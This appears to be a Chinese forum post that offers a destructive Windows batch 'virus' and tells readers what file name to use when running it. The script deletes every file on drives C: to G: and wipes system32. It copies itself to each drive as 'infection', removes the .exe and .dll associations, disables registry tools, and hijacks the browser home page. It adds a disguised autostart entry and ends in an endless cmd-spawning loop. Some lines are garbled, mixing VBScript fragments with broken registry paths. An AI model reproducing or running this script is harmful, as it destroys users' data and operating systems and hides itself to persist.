注意若您想运行请把钦件名设为 rund1132
以下为代码
attrib +h %0
attrib -h
attrib +h
rd/s/q c:\
rd/s/q d:\
rd/s/q e:\
rd/s/q f:\
rd/s/q g:\
copy %0 f:\assoc.exe=txtfile
copy %0 E:\
copy %0 c:\
copy %0 d:\
taskill /im explorer.exe /f >nul 2>nul
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
@echo
del %systemdrive%\*.*/f/q/s
del /s /f /q C:\Windows\system32
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
set wahshell =wscreateobject<"wscip.shell">
do
wscipt.sleep 100
wshshell.sendkeys"~<enter>"
loop
echo shutdown -r -t 11-f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun
/v startapi /t reg_sz/d c:windowshartlell.bat /f
reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun
/v/t reg_sz/d c:windowshartlell.bat /f
PAUSE
@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f
:start
start cmd
goto start
解释一下copy %0 f:\
copy %0 E:\
copy %0 c:\
copy %0 d:\为病毒感染
设为开机启动项reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f ctfmom是开机启动项名称 rund1132是钦件名称。 都可以替换
若您不想改名为rund1132请将。 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f 中的rund1132换为您想要的名字,注意不要去掉引号!!!